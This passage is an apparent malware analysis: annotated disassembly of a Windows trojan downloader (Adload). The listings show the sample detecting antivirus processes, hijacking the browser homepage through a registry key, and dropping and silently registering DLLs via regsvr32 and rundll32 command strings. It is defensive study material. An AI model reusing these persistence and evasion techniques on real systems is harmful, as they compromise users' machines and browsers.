00403688 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
0040368B |. 68 DCE04300 PUSH 复件_123.0043E0DC ; ASCII "dllname"
00403690 |. E8 86E9FFFF CALL 复件_123.0040201B
00403695 |. 68 9CE04300 PUSH 复件_123.0043E09C ; ASCII "D:\ssshall"
0040369A |. 68 D4E04300 PUSH 复件_123.0043E0D4 ; ASCII "dllpath"
0040369F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004036A2 |. E8 74E9FFFF CALL 复件_123.0040201B
004036A7 |> 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004036AA |. E8 1EDBFFFF CALL 复件_123.004011CD // close registry key
004036AF |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
004036B2 |. C645 FC 05 MOV BYTE PTR SS:[EBP-4],5
004036B6 |. E8 F1DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036BB |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004036BE |. C645 FC 04 MOV BYTE PTR SS:[EBP-4],4
004036C2 |. E8 6BDAFFFF CALL 复件_123.00401132
004036C7 |. 8D4D EC LEA ECX,DWORD PTR SS:[EBP-14]
004036CA |. C645 FC 03 MOV BYTE PTR SS:[EBP-4],3
004036CE |. E8 D9DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036D3 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
004036D6 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2
004036DA |. E8 CDDDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036DF |. 8D4D E4 LEA ECX,DWORD PTR SS:[EBP-1C]
004036E2 |. C645 FC 01 MOV BYTE PTR SS:[EBP-4],1
004036E6 |. E8 C1DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036EB |. 8D4D E0 LEA ECX,DWORD PTR SS:[EBP-20]
004036EE |. 885D FC MOV BYTE PTR SS:[EBP-4],BL
004036F1 |. E8 B6DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036F6 |. 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
004036FA |. 8D4D C4 LEA ECX,DWORD PTR SS:[EBP-3C]
004036FD |. E8 ACDEFFFF CALL <JMP.&MFC42.#665_??1CFile@@UAE@XZ>
00403702 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
00403705 |. 5E POP ESI
00403706 |. 5B POP EBX
00403707 |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX
0040370E |. C9 LEAVE
0040370F \. C3 RETN
Code:
00401197 /$ 55 PUSH EBP
00401198 |. 8BEC MOV EBP,ESP
0040119A |. 51 PUSH ECX
0040119B |. 56 PUSH ESI
0040119C |. 8BF1 MOV ESI,ECX
0040119E |. FF75 0C PUSH DWORD PTR SS:[EBP+C]
004011A1 |. 8D4E 08 LEA ECX,DWORD PTR DS:[ESI+8]
004011A4 |. E8 09030000 CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004011A9 |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
004011AC |. 83C6 04 ADD ESI,4
004011AF |. 50 PUSH EAX ; /pDisposition
004011B0 |. 33C0 XOR EAX,EAX ; |
004011B2 |. 56 PUSH ESI ; |pHandle
004011B3 |. 50 PUSH EAX ; |pSecurity => NULL
004011B4 |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
004011B9 |. 50 PUSH EAX ; |Options => REG_OPTION_NON_VOLATILE
004011BA |. 50 PUSH EAX ; |Class => NULL
004011BB |. 50 PUSH EAX ; |Reserved => 0
004011BC |. FF75 0C PUSH DWORD PTR SS:[EBP+C] ; |Subkey
004011BF |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; |hKey
004011C2 |. FF15 08504000 CALL DWORD PTR DS:[<&ADVAPI32.RegCreateK>; \RegCreateKeyExA
004011C8 |. 5E POP ESI
004011C9 |. C9 LEAVE
004011CA \. C2 0800 RETN 8
Code:
00404000 /$ B8 0C194000 MOV EAX,复件_123.0040190C
00404005 |. E8 E6D5FFFF CALL 复件_123.004015F0
0040400A |. 81EC 2C010000 SUB ESP,12C
00404010 |. 56 PUSH ESI
00404011 |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00404014 |. E8 87D4FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
00404019 |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0
0040401D |. 6A 00 PUSH 0 ; /ProcessID = 0
0040401F |. 6A 02 PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
00404021 |. E8 D2D7FFFF CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot // take a process snapshot in preparation for searching processes
00404026 |. 8BF0 MOV ESI,EAX
00404028 |. 8D85 C8FEFFFF LEA EAX,DWORD PTR SS:[EBP-138]
0040402E |. 50 PUSH EAX ; /pProcessentry
0040402F |. 56 PUSH ESI ; |hSnapshot
00404030 |. C785 C8FEFFFF>MOV DWORD PTR SS:[EBP-138],128 ; |
0040403A |. E8 B3D7FFFF CALL <JMP.&KERNEL32.Process32First> ; \Process32First
0040403F |> 85C0 /TEST EAX,EAX
00404041 |. 74 3D |JE SHORT 复件_123.00404080
00404043 |. 8D85 ECFEFFFF |LEA EAX,DWORD PTR SS:[EBP-114]
00404049 |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
0040404C |. 50 |PUSH EAX
0040404D |. E8 60D4FFFF |CALL <JMP.&MFC42.#860_??4CString@@QAEAB>
00404052 |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00404055 |. E8 72D5FFFF |CALL <JMP.&MFC42.#4202_?MakeLower@CStri>
0040405A |. 68 74E24300 |PUSH 复件_123.0043E274 ; ASCII "ravmond.exe"
0040405F |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00404062 |. E8 5FD5FFFF |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
00404067 |. 83F8 FF |CMP EAX,-1
0040406A |. 75 0F |JNZ SHORT 复件_123.0040407B
0040406C |. 8D85 C8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-138]
00404072 |. 50 |PUSH EAX ; /pProcessentry
00404073 |. 56 |PUSH ESI ; |hSnapshot
00404074 |. E8 73D7FFFF |CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
00404079 |.^ EB C4 \JMP SHORT 复件_123.0040403F
0040407B |> 6A 01 PUSH 1
0040407D |. 5E POP ESI
0040407E |. EB 09 JMP SHORT 复件_123.00404089
00404080 |> 56 PUSH ESI ; /hObject
00404081 |. FF15 60504000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
00404087 |. 33F6 XOR ESI,ESI
00404089 |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
0040408D |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00404090 |. E8 17D4FFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00404095 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
00404098 |. 8BC6 MOV EAX,ESI
0040409A |. 5E POP ESI
0040409B |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX
004040A2 |. C9 LEAVE
004040A3 \. C3 RETN
Code:
00404389 /$ 55 PUSH EBP
0040438A |. 8BEC MOV EBP,ESP
0040438C |. 81EC 30020000 SUB ESP,230
00404392 |. 53 PUSH EBX
00404393 |. 33DB XOR EBX,EBX
00404395 |. 53 PUSH EBX ; /ProcessID = 0
00404396 |. 6A 02 PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
00404398 |. E8 5BD4FFFF CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot
0040439D |. 8D8D D4FEFFFF LEA ECX,DWORD PTR SS:[EBP-12C]
004043A3 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
004043A6 |. 51 PUSH ECX ; /pProcessentry
004043A7 |. 50 PUSH EAX ; |hSnapshot
004043A8 |. C785 D4FEFFFF>MOV DWORD PTR SS:[EBP-12C],128 ; |
004043B2 |. E8 3BD4FFFF CALL <JMP.&KERNEL32.Process32First> ; \Process32First
004043B7 |. 85C0 TEST EAX,EAX
004043B9 |. 74 70 JE SHORT 复件_123.0040442B
004043BB |. 56 PUSH ESI
004043BC |. 8B35 50504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.OutputD>; kernel32.OutputDebugStringA
004043C2 |. 57 PUSH EDI
004043C3 |. BF F0E34300 MOV EDI,复件_123.0043E3F0 ; ASCII "Find 360 Process"
004043C8 |> 8D85 F8FEFFFF /LEA EAX,DWORD PTR SS:[EBP-108]
004043CE |. 68 E4E34300 |PUSH 复件_123.0043E3E4 ; /s2 = "360tray.exe"
004043D3 |. 50 |PUSH EAX ; |s1
004043D4 |. FF15 88514000 |CALL DWORD PTR DS:[<&MSVCRT.strstr>] ; \strstr
004043DA |. 59 |POP ECX
004043DB |. 85C0 |TEST EAX,EAX
004043DD |. 59 |POP ECX
004043DE |. 75 18 |JNZ SHORT 复件_123.004043F8
004043E0 |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
004043E6 |. 68 D8E34300 |PUSH 复件_123.0043E3D8 ; /s2 = "360TRAY.EXE"
004043EB |. 50 |PUSH EAX ; |s1
004043EC |. FF15 88514000 |CALL DWORD PTR DS:[<&MSVCRT.strstr>] ; \strstr
004043F2 |. 59 |POP ECX
004043F3 |. 85C0 |TEST EAX,EAX
004043F5 |. 59 |POP ECX
004043F6 |. 74 1E |JE SHORT 复件_123.00404416
004043F8 |> 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
004043FE |. 50 |PUSH EAX ; /src
004043FF |. 8D85 D0FDFFFF |LEA EAX,DWORD PTR SS:[EBP-230] ; |
00404405 |. 50 |PUSH EAX ; |dest
00404406 |. E8 C7D1FFFF |CALL <JMP.&MSVCRT.strcpy> ; \strcpy
0040440B |. 8B9D DCFEFFFF |MOV EBX,DWORD PTR SS:[EBP-124]
00404411 |. 59 |POP ECX
00404412 |. 59 |POP ECX
00404413 |. 57 |PUSH EDI
00404414 |. FFD6 |CALL ESI
00404416 |> 8D85 D4FEFFFF |LEA EAX,DWORD PTR SS:[EBP-12C]
0040441C |. 50 |PUSH EAX ; /pProcessentry
0040441D |. FF75 FC |PUSH DWORD PTR SS:[EBP-4] ; |hSnapshot
00404420 |. E8 C7D3FFFF |CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
00404425 |. 85C0 |TEST EAX,EAX
00404427 |.^ 75 9F \JNZ SHORT 复件_123.004043C8
00404429 |. 5F POP EDI
0040442A |. 5E POP ESI
0040442B |> FF75 FC PUSH DWORD PTR SS:[EBP-4] ; /hObject
0040442E |. FF15 60504000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
00404434 |. 33C0 XOR EAX,EAX
00404436 |. 3BC3 CMP EAX,EBX
00404438 |. 5B POP EBX
00404439 |. 1BC0 SBB EAX,EAX
0040443B |. F7D8 NEG EAX
0040443D |. C9 LEAVE
0040443E \. C3 RETN
Registry key used to lock the homepage:
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
Code:
004041DA /$ B8 20194000 MOV EAX,123.00401920
004041DF |. E8 0CD4FFFF CALL 123.004015F0
004041E4 |. 81EC 14020000 SUB ESP,214
004041EA |. 56 PUSH ESI
004041EB |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
004041EE |. E8 0ACFFFFF CALL 123.004010FD
004041F3 |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0
004041F7 |. BE 04010000 MOV ESI,104
004041FC |. 8D85 E0FDFFFF LEA EAX,DWORD PTR SS:[EBP-220]
00404202 |. 56 PUSH ESI ; /BufSize = 104 (260.)
00404203 |. 50 PUSH EAX ; |Buffer
00404204 |. FF15 4C504000 CALL DWORD PTR DS:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA // get the Windows directory
0040420A |. 56 PUSH ESI ; /n => 104 (260.)
0040420B |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C] ; |
00404211 |. 6A 00 PUSH 0 ; |c = 00
00404213 |. 50 PUSH EAX ; |s
00404214 |. E8 3BD4FFFF CALL <JMP.&MSVCRT.memset> ; \memset
00404219 |. 8A85 E0FDFFFF MOV AL,BYTE PTR SS:[EBP-220]
0040421F |. 68 48E34300 PUSH 123.0043E348 ; /src = ":\Program Files\Internet Explorer\IEXPLORE.EXE"
00404224 |. 8885 E5FEFFFF MOV BYTE PTR SS:[EBP-11B],AL ; |
0040422A |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C] ; |
00404230 |. 50 PUSH EAX ; |dest
00404231 |. C685 E4FEFFFF>MOV BYTE PTR SS:[EBP-11C],22 ; |
00404238 |. E8 9BD3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040423D |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C]
00404243 |. 68 44E34300 PUSH 123.0043E344 ; /src = """
00404248 |. 50 PUSH EAX ; |dest
00404249 |. E8 8AD3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040424E |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C]
00404254 |. 68 40E34300 PUSH 123.0043E340 ; /src = " "
00404259 |. 50 PUSH EAX ; |dest
0040425A |. E8 79D3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040425F |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C]
00404265 |. 68 28E34300 PUSH 123.0043E328 ; /src = "http://www.rom12580.cn"
0040426A |. 50 PUSH EAX ; |dest
0040426B |. E8 68D3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
00404270 |. 83C4 2C ADD ESP,2C
00404273 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00404276 |. 68 E0E24300 PUSH 123.0043E2E0 ; ASCII "CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command"
0040427B |. 68 00000080 PUSH 80000000
00404280 |. E8 E6CEFFFF CALL 123.0040116B // write to the registry
00404285 |. 85C0 TEST EAX,EAX
00404287 |. 5E POP ESI
00404288 |. 75 11 JNZ SHORT 123.0040429B
0040428A |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C]
00404290 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00404293 |. 50 PUSH EAX
00404294 |. 6A 00 PUSH 0
00404296 |. E8 A8DDFFFF CALL 123.00402043 // append http://www.rom12580.cn after IEXPLORE.EXE
0040429B |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
0040429F |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
004042A2 |. E8 8BCEFFFF CALL 123.00401132 // close the registry key
004042A7 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
004042AA |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX
004042B1 |. C9 LEAVE
004042B2 \. C3 RETN
Code:
0040116B /$ 56 PUSH ESI
0040116C |. 8BF1 MOV ESI,ECX
0040116E |. FF7424 0C PUSH DWORD PTR SS:[ESP+C]
00401172 |. 8D4E 08 LEA ECX,DWORD PTR DS:[ESI+8]
00401175 |. E8 38030000 CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
0040117A |. 83C6 04 ADD ESI,4
0040117D |. 56 PUSH ESI ; /pHandle
0040117E |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
00401183 |. 6A 00 PUSH 0 ; |Reserved = 0
00401185 |. FF7424 18 PUSH DWORD PTR SS:[ESP+18] ; |Subkey
00401189 |. FF7424 18 PUSH DWORD PTR SS:[ESP+18] ; |hKey
0040118D |. FF15 0C504000 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00401193 |. 5E POP ESI
00401194 \. C2 0800 RETN 8
Code:
00402043 /$ 56 PUSH ESI
00402044 |. 8BF1 MOV ESI,ECX
00402046 |. FF7424 0C PUSH DWORD PTR SS:[ESP+C] ; /s
0040204A |. E8 C1F5FFFF CALL <JMP.&MSVCRT.strlen> ; \strlen
0040204F |. 59 POP ECX ; 0012FDC4
00402050 |. 40 INC EAX
00402051 |. 50 PUSH EAX ; /BufSize
00402052 |. FF7424 10 PUSH DWORD PTR SS:[ESP+10] ; |Buffer
00402056 |. 6A 02 PUSH 2 ; |ValueType = REG_EXPAND_SZ
00402058 |. 6A 00 PUSH 0 ; |Reserved = 0
0040205A |. FF7424 18 PUSH DWORD PTR SS:[ESP+18] ; |ValueName
0040205E |. FF76 04 PUSH DWORD PTR DS:[ESI+4] ; |hKey
00402061 |. FF15 00504000 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA
00402067 |. 5E POP ESI
00402068 \. C2 0800 RETN 8
Code:
004030CA /$ 55 PUSH EBP
004030CB |. 8BEC MOV EBP,ESP
004030CD |. 81EC 04010000 SUB ESP,104
004030D3 |. 53 PUSH EBX
004030D4 |. 56 PUSH ESI
004030D5 |. 8B35 4C504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.GetWind>; kernel32.GetWindowsDirectoryA // get the system directory
004030DB |. 57 PUSH EDI
004030DC |. BF 04010000 MOV EDI,104
004030E1 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
004030E7 |. 57 PUSH EDI ; /BufSize => 104 (260.)
004030E8 |. 50 PUSH EAX ; |Buffer
004030E9 |. FFD6 CALL ESI ; \GetWindowsDirectoryA
004030EB |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
004030F1 |. 68 90E04300 PUSH 复件_123.0043E090 ; /src = "\System32\"
004030F6 |. 50 PUSH EAX ; |dest
004030F7 |. E8 DCE4FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
004030FC |. FF35 E8E54300 PUSH DWORD PTR DS:[43E5E8] ; /src = "zrrs1.dll"
00403102 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] ; |
00403108 |. 50 PUSH EAX ; |dest
00403109 |. E8 CAE4FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040310E |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00403114 |. 50 PUSH EAX
00403115 |. E8 89E1FFFF CALL 复件_123.004012A3
0040311A |. 8B1D 50504000 MOV EBX,DWORD PTR DS:[<&KERNEL32.OutputD>; kernel32.OutputDebugStringA
00403120 |. 83C4 14 ADD ESP,14
00403123 |. 85C0 TEST EAX,EAX
00403125 |. 75 16 JNZ SHORT 复件_123.0040313D
00403127 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
0040312D |. 50 PUSH EAX ; /String
0040312E |. FFD3 CALL EBX ; \OutputDebugStringA
00403130 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00403136 |. 50 PUSH EAX
00403137 |. E8 17FFFFFF CALL 复件_123.00403053
0040313C |. 59 POP ECX
0040313D |> 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00403143 |. 57 PUSH EDI
00403144 |. 50 PUSH EAX
00403145 |. FFD6 CALL ESI
00403147 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
0040314D |. 68 7CE04300 PUSH 复件_123.0043E07C ; /src = "\System32\dllcache\"
00403152 |. 50 PUSH EAX ; |dest
00403153 |. E8 80E4FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
00403158 |. FF35 E8E54300 PUSH DWORD PTR DS:[43E5E8] ; /src = "zrrs1.dll"
0040315E |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] ; |
00403164 |. 50 PUSH EAX ; |dest
00403165 |. E8 6EE4FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040316A |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00403170 |. 50 PUSH EAX
00403171 |. E8 2DE1FFFF CALL 复件_123.004012A3
00403176 |. 83C4 14 ADD ESP,14
00403179 |. 85C0 TEST EAX,EAX
0040317B |. 75 16 JNZ SHORT 复件_123.00403193
0040317D |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00403183 |. 50 PUSH EAX
00403184 |. FFD3 CALL EBX
00403186 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
0040318C |. 50 PUSH EAX
0040318D |. E8 C1FEFFFF CALL 复件_123.00403053
00403192 |. 59 POP ECX
00403193 |> 5F POP EDI
00403194 |. 5E POP ESI
00403195 |. 5B POP EBX
00403196 |. C9 LEAVE
00403197 \. C3 RETN
Code:
00403211 /$ B8 B4184000    MOV EAX,复件_123.004018B4
00403216 |. E8 D5E3FFFF    CALL 复件_123.004015F0                   ; SEH frame setup (MFC prolog helper)
0040321B |. 51             PUSH ECX
0040321C |. 51             PUSH ECX
0040321D |. 56             PUSH ESI
0040321E |. 8D4D F0        LEA ECX,DWORD PTR SS:[EBP-10]
00403221 |. E8 7AE2FFFF    CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>; CString::CString()
00403226 |. 33F6           XOR ESI,ESI                              ; ESI = return value, 0 until the last helper succeeds
00403228 |. 68 9CE04300    PUSH 复件_123.0043E09C                   ; ASCII "D:\ssshall"
0040322D |. 8D4D F0        LEA ECX,DWORD PTR SS:[EBP-10]
00403230 |. 8975 FC        MOV DWORD PTR SS:[EBP-4],ESI
00403233 |. E8 7AE2FFFF    CALL <JMP.&MFC42.#860_??4CString@@QAEABV>; CString::operator=("D:\ssshall")
00403238 |. 51             PUSH ECX
00403239 |. 8D45 F0        LEA EAX,DWORD PTR SS:[EBP-10]
0040323C |. 8BCC           MOV ECX,ESP
0040323E |. 8965 EC        MOV DWORD PTR SS:[EBP-14],ESP
00403241 |. 50             PUSH EAX
00403242 |. E8 5BE3FFFF    CALL <JMP.&MFC42.#535_??0CString@@QAE@AB>; copy-construct the CString argument on the stack
00403247 |. E8 4CFFFFFF    CALL 复件_123.00403198                   ; helper 1 ("D:\ssshall")
0040324C |. 3BC6           CMP EAX,ESI
0040324E |. 59             POP ECX
0040324F |. 75 19          JNZ SHORT 复件_123.0040326A              ; helper 1 succeeded -> go straight to helper 3
00403251 |. 51             PUSH ECX
00403252 |. 8D45 F0        LEA EAX,DWORD PTR SS:[EBP-10]
00403255 |. 8BCC           MOV ECX,ESP
00403257 |. 8965 EC        MOV DWORD PTR SS:[EBP-14],ESP
0040325A |. 50             PUSH EAX
0040325B |. E8 42E3FFFF    CALL <JMP.&MFC42.#535_??0CString@@QAE@AB>
00403260 |. E8 74FFFFFF    CALL 复件_123.004031D9                   ; helper 2 ("D:\ssshall"), tried only if helper 1 failed
00403265 |. 3BC6           CMP EAX,ESI
00403267 |. 59             POP ECX
00403268 |. 74 1C          JE SHORT 复件_123.00403286               ; both failed -> return 0
0040326A |> 51             PUSH ECX
0040326B |. 8D45 F0        LEA EAX,DWORD PTR SS:[EBP-10]
0040326E |. 8BCC           MOV ECX,ESP
00403270 |. 8965 EC        MOV DWORD PTR SS:[EBP-14],ESP
00403273 |. 50             PUSH EAX
00403274 |. E8 29E3FFFF    CALL <JMP.&MFC42.#535_??0CString@@QAE@AB>
00403279 |. E8 77FFFFFF    CALL 复件_123.004031F5                   ; helper 3 ("D:\ssshall")
0040327E |. 3BC6           CMP EAX,ESI
00403280 |. 59             POP ECX
00403281 |. 74 03          JE SHORT 复件_123.00403286
00403283 |. 6A 01          PUSH 1
00403285 |. 5E             POP ESI                                  ; ESI = 1 only when helper 3 returned non-zero
00403286 |> 834D FC FF     OR DWORD PTR SS:[EBP-4],FFFFFFFF
0040328A |. 8D4D F0        LEA ECX,DWORD PTR SS:[EBP-10]
0040328D |. E8 1AE2FFFF    CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>; CString::~CString()
00403292 |. 8B4D F4        MOV ECX,DWORD PTR SS:[EBP-C]
00403295 |. 8BC6           MOV EAX,ESI
00403297 |. 64:890D 00000> MOV DWORD PTR FS:[0],ECX                 ; unlink SEH frame
0040329E |. 5E             POP ESI
0040329F |. C9             LEAVE
004032A0 \. C3             RETN
Detection name: Trojan-Downloader.Win32.Adload.vk (Micropoint's classification)
Code:
004033B1 /$ 55             PUSH EBP
004033B2 |. 8BEC           MOV EBP,ESP
004033B4 |. 81EC 08020000  SUB ESP,208                              ; two buffers: path at [EBP-104], command line at [EBP-208]
004033BA |. 56             PUSH ESI
004033BB |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]
004033C1 |. 68 04010000    PUSH 104                                 ; /BufSize = 104 (260.)
004033C6 |. 50             PUSH EAX                                 ; |Buffer
004033C7 |. FF15 4C504000  CALL DWORD PTR DS:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
004033CD |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]
004033D3 |. 68 90E04300    PUSH 复件_123.0043E090                   ; /src = "\System32\"
004033D8 |. 50             PUSH EAX                                 ; |dest
004033D9 |. E8 FAE1FFFF    CALL <JMP.&MSVCRT.strcat>                ; \strcat
004033DE |. FF35 E4E54300  PUSH DWORD PTR DS:[43E5E4]               ; /src = "iksii.dll"  (second run-time generated name, separate global from zrrs1.dll)
004033E4 |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]           ; |
004033EA |. 50             PUSH EAX                                 ; |dest = "C:\windows\System32\"
004033EB |. E8 E8E1FFFF    CALL <JMP.&MSVCRT.strcat>                ; \strcat
004033F0 |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]
004033F6 |. 50             PUSH EAX
004033F7 |. E8 A7DEFFFF    CALL 复件_123.004012A3                   ; same existence-style check as in the zrrs1.dll routine
004033FC |. 8B35 50504000  MOV ESI,DWORD PTR DS:[<&KERNEL32.OutputD>; kernel32.OutputDebugStringA
00403402 |. 83C4 14        ADD ESP,14
00403405 |. 85C0           TEST EAX,EAX
00403407 |. 75 16          JNZ SHORT 复件_123.0040341F
00403409 |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]
0040340F |. 50             PUSH EAX                                 ; /String
00403410 |. FFD6           CALL ESI                                 ; \OutputDebugStringA
00403412 |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]
00403418 |. 50             PUSH EAX
00403419 |. E8 E1FEFFFF    CALL 复件_123.004032FF                   ; drop routine for iksii.dll, only when 004012A3 returned 0
0040341E |. 59             POP ECX
0040341F |> 8D85 F8FDFFFF  LEA EAX,DWORD PTR SS:[EBP-208]
00403425 |. 68 C4E04300    PUSH 复件_123.0043E0C4                   ; /src = "regsvr32 /s "
0040342A |. 50             PUSH EAX                                 ; |dest
0040342B |. E8 A2E1FFFF    CALL <JMP.&MSVCRT.strcpy>                ; \strcpy
00403430 |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]
00403436 |. 50             PUSH EAX                                 ; /src
00403437 |. 8D85 F8FDFFFF  LEA EAX,DWORD PTR SS:[EBP-208]           ; |
0040343D |. 50             PUSH EAX                                 ; |dest
0040343E |. E8 95E1FFFF    CALL <JMP.&MSVCRT.strcat>                ; \strcat  -> "regsvr32 /s <windir>\System32\iksii.dll"  (silent COM registration)
00403443 |. 83C4 10        ADD ESP,10
00403446 |. 8D85 F8FDFFFF  LEA EAX,DWORD PTR SS:[EBP-208]
0040344C |. 50             PUSH EAX
0040344D |. FFD6           CALL ESI                                 ; OutputDebugStringA(command line)
0040344F |. 8D85 F8FDFFFF  LEA EAX,DWORD PTR SS:[EBP-208]
00403455 |. 50             PUSH EAX
00403456 |. E8 1BFFFFFF    CALL 复件_123.00403376                   ; command line handed to 00403376
0040345B |. 59             POP ECX
0040345C |. 5E             POP ESI
0040345D |. C9             LEAVE
0040345E \. C3             RETN
Code:
004032A1 /$ 55             PUSH EBP
004032A2 |. 8BEC           MOV EBP,ESP
004032A4 |. 81EC 04010000  SUB ESP,104
004032AA |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]
004032B0 |. 68 B8E04300    PUSH 复件_123.0043E0B8                   ; /src = "rundll32 "
004032B5 |. 50             PUSH EAX                                 ; |dest
004032B6 |. E8 17E3FFFF    CALL <JMP.&MSVCRT.strcpy>                ; \strcpy
004032BB |. FF35 E8E54300  PUSH DWORD PTR DS:[43E5E8]               ; /src = "zrrs1.dll"  (bare name: resolved through the normal DLL search order, which reaches System32 where it was dropped)
004032C1 |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]           ; |
004032C7 |. 50             PUSH EAX                                 ; |dest
004032C8 |. E8 0BE3FFFF    CALL <JMP.&MSVCRT.strcat>                ; \strcat
004032CD |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]
004032D3 |. 68 A8E04300    PUSH 复件_123.0043E0A8                   ; /src = " , InstallMyDll"
004032D8 |. 50             PUSH EAX                                 ; |dest
004032D9 |. E8 FAE2FFFF    CALL <JMP.&MSVCRT.strcat>                ; \strcat  -> "rundll32 zrrs1.dll , InstallMyDll"
004032DE |. 83C4 18        ADD ESP,18
004032E1 |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]
004032E7 |. 50             PUSH EAX                                 ; /String
